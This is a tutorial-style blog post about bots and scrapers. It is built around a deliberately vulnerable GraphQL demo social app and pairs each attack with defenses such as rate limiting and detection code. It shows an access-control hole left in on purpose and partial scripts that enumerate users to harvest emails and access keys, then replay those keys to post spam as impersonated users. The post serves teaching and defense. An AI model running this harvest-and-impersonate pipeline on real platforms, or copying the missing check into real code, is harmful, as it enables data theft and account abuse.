Bots and Scrapers: Motivations, Tactics, and Defenses

scraping November 16, 2024 Long read

Bots and scrapers, a quick intro

Bots and scrapers play a much bigger role online than most people realize. Some keep the web running smoothly; others cause real problems for platforms and the people who use them. I want to walk through what they actually do, why they exist, and how to understand and defend against them, mostly so that the writeup I would have wanted years ago is out there. This is just me sharing what I have picked up along the way.

Understanding bots and scrapers

Bots are automated programs that interact with websites or applications. Some of them perform helpful tasks and take work off our hands. Others pretend to be real people or use automation in ways that create problems. Scrapers focus on collecting information by pulling data from a site piece by piece. Sometimes this is done for legitimate reasons. Other times it is used to gather large amounts of data without permission or control.

Many bots are designed to copy human behavior closely enough to blend in, making them difficult to spot. Scrapers tend to be quieter but persistent, slowly gathering the information they are after. While their goals differ, both rely on finding weak points in systems, and that is where the trouble usually begins.

Motives and tactics

The reasons behind bot activity vary widely. Some bots spread unwanted messages or try to influence how people think. Others aim to trick users, gather sensitive information, or take advantage of system features. Scrapers often collect data for research, monitoring, or analysis, but they can also be used for large-scale data harvesting, copying entire profiles or sets of content.

The tactics used by both are constantly evolving. Bots may rotate user agents or IP addresses to avoid detection. Scrapers may carefully time their requests to stay under rate limits. When these two tools work together, they can create an even larger impact than either would on its own.

Combining forces for greater impact

One of the more concerning situations is when bots and scrapers support each other. For example, a scraper might collect user data and pass it to a bot that then spreads messages pretending to be real people. This type of pairing can mislead users, damage trust, and weaken the overall safety of a platform. When left unchecked, it becomes difficult to know what is genuine and what is part of a coordinated effort.

A generic social media app

To help demonstrate how these issues can appear in real systems, I created a simple GraphQL-based application that mimics a small social media platform. It generates sample users, posts, and interactions. The point of the exercise is to show where things can go wrong and how vulnerabilities can appear in ways that may not be obvious at first glance.

# [truncated]
def validate_access_key(access_key):
    return access_key == "valid_access_key"
# [truncated]

This function checks whether the access key on the incoming request matches the expected value, which here is a hardcoded placeholder. It is intentionally simple for demonstration purposes.

# [truncated]
access_key = info.context.get('access_key')
if access_key != self.access_key:
    raise Exception("Access denied")
# [truncated]

Each resolver checks the provided key before returning data. In a real application you would obviously want stronger checks than this, but for the demo it shows how easily things can break if the checks are skipped or applied inconsistently.
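
One way to reduce the risk of a check being skipped is to put it in a single decorator and apply that to every resolver. The sketch below is only an illustration and not the code from the demo app: `require_owner_key`, `AccessDenied`, `FakeInfo`, and `resolve_email` are hypothetical names, and it assumes `info.context` is a dict, as in the snippets above.

```python
import functools


class AccessDenied(Exception):
    """Raised when the caller's access key does not match the object's key."""


def require_owner_key(resolver):
    """Wrap a resolver so it only runs when the caller's key matches self.access_key."""
    @functools.wraps(resolver)
    def wrapper(self, info, *args, **kwargs):
        # Assumption: info.context is a dict holding the request's access key.
        provided = info.context.get("access_key")
        if provided is None or provided != self.access_key:
            raise AccessDenied("Access denied: Invalid access key")
        return resolver(self, info, *args, **kwargs)
    return wrapper


class FakeInfo:
    """Stand-in for the GraphQL info object, for illustration only."""
    def __init__(self, access_key):
        self.context = {"access_key": access_key}


class User:
    """Simplified stand-in for the demo's User type."""
    def __init__(self, id, email, access_key):
        self.id = id
        self.email = email
        self.access_key = access_key

    @require_owner_key
    def resolve_email(self, info):
        return self.email
```

With the check in one place, a resolver that lacks the decorator stands out in review, which is easier to spot than a missing `if` inside a method body.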

In this example, user 8 corresponds to James Martinez, which we can see by running a simple GraphQL query.

Request

curl -X POST -H "Content-Type: application/json" \
     -H "Access-Key: 50441f01-8b54-4ea1-a0c1-88c02dd97bc0" \
     --data '{"query": "{ user(id: 8) { id name } }"}' \
     http://localhost:5000/graphql

Response

{
  "data": {
    "user": {
      "id": "VXNlcjo4",
      "name": "James Martinez"
    }
  }
}
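
The `id` in that response looks opaque, but it is plain base64. A minimal sketch for decoding it follows; `decode_global_id` is a hypothetical helper, and the `TypeName:local_id` layout is an assumption based on what this particular value decodes to.

```python
import base64


def decode_global_id(global_id):
    """Split a base64-encoded 'TypeName:local_id' string into its two parts."""
    decoded = base64.b64decode(global_id).decode("utf-8")
    type_name, _, local_id = decoded.partition(":")
    return type_name, local_id


print(decode_global_id("VXNlcjo4"))  # ('User', '8')
```

Because the encoding is reversible, these IDs are just as easy to enumerate as the plain integers used in the query.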

If the same user tries to view another user's private information, the system correctly denies access. This is what we expect and want to see.

Request

curl -X POST -H "Content-Type: application/json" \
     -H "Access-Key: 50441f01-8b54-4ea1-a0c1-88c02dd97bc0" \
     --data '{"query": "{ user(id: 9) { id name email posts (limit:2) { id title content } } }"}' \
     http://localhost:5000/graphql

Response

{
  "data": { "user": null },
  "errors": [
    { "message": "Access denied: Invalid access key", "path": ["user"] }
  ]
}

Now that we understand the intended behavior, we can look at the vulnerable portions of the application. These were added on purpose to show how easily a small oversight can create an opening.

The issues appear in the resolve_posts and resolve_user methods within the User class. Here is a portion of the code:

# [truncated]
def resolve_posts(self, info, limit=None):
    session = info.context.get('session')
    query = session.query(PostModel).filter_by(user_id=self.id)
    if limit is not None:
        query = query.limit(limit)
    return query.all()
# [truncated]
def resolve_user(self, info, id):
    access_key = info.context.get('access_key')
# [truncated]

The key check is missing here: resolve_posts never looks at the access key at all. Because of that, any user can request another user's posts, comments, or profile data. That is exactly what a scraper looks for, especially if the goal is to collect as much data as possible while pretending to be different users.

If we repeat the earlier request with the access-control gap in place, the server returns user 9's name, email, and posts without complaint. With this opening, gathering information in bulk becomes very easy, especially when combined with automation.
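
Fixing the missing check is the real remedy, but it also helps to notice when one key starts walking through user IDs. The sketch below counts how many distinct users a single access key has asked about. `EnumerationDetector` and its threshold are hypothetical, and a real system would also need to expire old entries.

```python
from collections import defaultdict


class EnumerationDetector:
    """Flag access keys that request many distinct user IDs."""

    def __init__(self, max_distinct_users=5):
        # The threshold is an arbitrary illustrative value, not a recommendation.
        self.max_distinct_users = max_distinct_users
        self._seen = defaultdict(set)

    def record(self, access_key, requested_user_id):
        """Record one lookup; return True once the key exceeds the threshold."""
        self._seen[access_key].add(requested_user_id)
        return len(self._seen[access_key]) > self.max_distinct_users


detector = EnumerationDetector(max_distinct_users=3)
for user_id in range(1, 6):
    if detector.record("example-key", user_id):
        print(f"key example-key looks like a scraper at user {user_id}")
```

Repeated lookups of the same user do not raise the count, so a normal user refreshing a profile is not flagged.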

From here, it is not difficult to imagine a scraper gathering access keys and turning them over to a bot that then spreads unwanted content by posting as real users.

# [truncated]
def send_request(user_id, lock, responses):
    graphql_query = {"query": "{ user(id: %d) { id name email accessKey } }" % user_id}
    headers = {
        "Content-Type": "application/json",
        "Access-Key": access_key,
    }
    response = requests.post(graphql_url, json=graphql_query, headers=headers)
    if response.status_code == 200 and response.json().get("data"):
# [truncated]

Below is a sample of the output from a simple scraping loop that gathers user data. This is the kind of information a bot can later misuse.

Scrape output

Response for user ID 1:
{"data": {"user": {"accessKey": "97c9ea8c-...", "email": "[email protected]", "name": "John Doe"}}}
Response for user ID 2:
{"data": {"user": {"accessKey": "f4a67797-...", "email": "[email protected]", "name": "Jane Smith"}}}
Response for user ID 3:
{"data": {"user": {"accessKey": "27a8b14e-...", "email": "[email protected]", "name": "Alice Johnson"}}}
...
[truncated]

Using the gathered keys, a bot can now post messages as if it were the real user, which is a real concern for any platform.

access_keys = ["50441f01-...", "27a8b14e-...", "59d73e34-...", ...]

def send_request(access_key):
    mutation_query = '''
    mutation {
      createPost(title: "Bot Post by James",
                 content: "Check out this totally safe link!! www.thisismalware.com") {
        post { id }
      }
    }
    '''
    # ... send with access_key in headers ...
    print(f"key:{access_key} post successful | id:{post_id}")

The bot script cycles through each access key and posts as the user tied to that key. This is how a simple oversight can quickly spiral into something much larger in a real-world environment.

key:c6790640-... post successful | id:UG9zdDo1MQ==
key:59d73e34-... post successful | id:UG9zdDo1Mw==
key:8968c9e0-... post successful | id:UG9zdDo1Mg==
key:f4a67797-... post successful | id:UG9zdDo1NA==
key:50441f01-... post successful | id:UG9zdDo1NQ==
...

Querying those posts shows the bot activity clearly: it has posted as multiple users, and each post carries the same message. This is a textbook spam-by-impersonation pattern, and it comes straight out of the scrape-then-replay pipeline described above.
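
Identical content appearing under many accounts is also something a platform can look for. The following is a rough sketch under simple assumptions: posts arrive as `(user_id, content)` pairs, and `normalize`, `find_replayed_content`, and `min_authors` are hypothetical names. It only catches exact copies after trivial whitespace and case changes.

```python
import hashlib
from collections import defaultdict


def normalize(text):
    """Lowercase and collapse whitespace so trivial edits hash the same."""
    return " ".join(text.lower().split())


def find_replayed_content(posts, min_authors=3):
    """Return {content_hash: sorted user_ids} for content shared by many users.

    posts is an iterable of (user_id, content) pairs.
    """
    authors_by_hash = defaultdict(set)
    for user_id, content in posts:
        digest = hashlib.sha256(normalize(content).encode("utf-8")).hexdigest()
        authors_by_hash[digest].add(user_id)
    return {
        digest: sorted(authors)
        for digest, authors in authors_by_hash.items()
        if len(authors) >= min_authors
    }
```

A bot that varies its wording would slip past this, so it is a first filter rather than a complete defense.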

This entire example is meant to show how small gaps in logic can grow into real issues. Even simple oversights can make it far too easy for bots and scrapers to abuse a system. The more we understand how they work, the better equipped we are to recognize warning signs and strengthen the systems we build.

Working toward better defenses

Keeping bots and scrapers in check requires continuous attention and patience. Good access control, proper rate limiting, careful validation, and regular code reviews all play an important role. Monitoring patterns and user behavior can also help catch unusual activity before it grows too large. It will always be a balancing act, but staying aware and adapting as tactics evolve is key.
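
To make the rate limiting point concrete, here is a minimal in-memory sliding-window limiter keyed by access key. It is a sketch under assumptions, not part of the demo app: `SlidingWindowLimiter` is a hypothetical class, the limits are arbitrary, and a production setup would normally keep this state in a shared store.

```python
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most max_requests per key within the last window_seconds."""

    def __init__(self, max_requests, window_seconds, clock=time.monotonic):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._clock = clock  # injectable so the limiter can be tested
        self._hits = defaultdict(deque)

    def allow(self, key):
        """Return True and record the request if the key is under its limit."""
        now = self._clock()
        hits = self._hits[key]
        # Drop timestamps that have fallen out of the window.
        while hits and now - hits[0] >= self.window_seconds:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False
        hits.append(now)
        return True


limiter = SlidingWindowLimiter(max_requests=2, window_seconds=60)
print([limiter.allow("example-key") for _ in range(3)])  # [True, True, False]
```

Keying on the access key rather than the IP address means rotating addresses does not reset the count, though a scraper holding many stolen keys can still spread its requests across them.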

I hope this breakdown offered some helpful insight. The more we share what we learn, the stronger our collective defenses become.

Want to explore the code and try it out yourself? Visit the generic_socialMedia repo on GitHub.
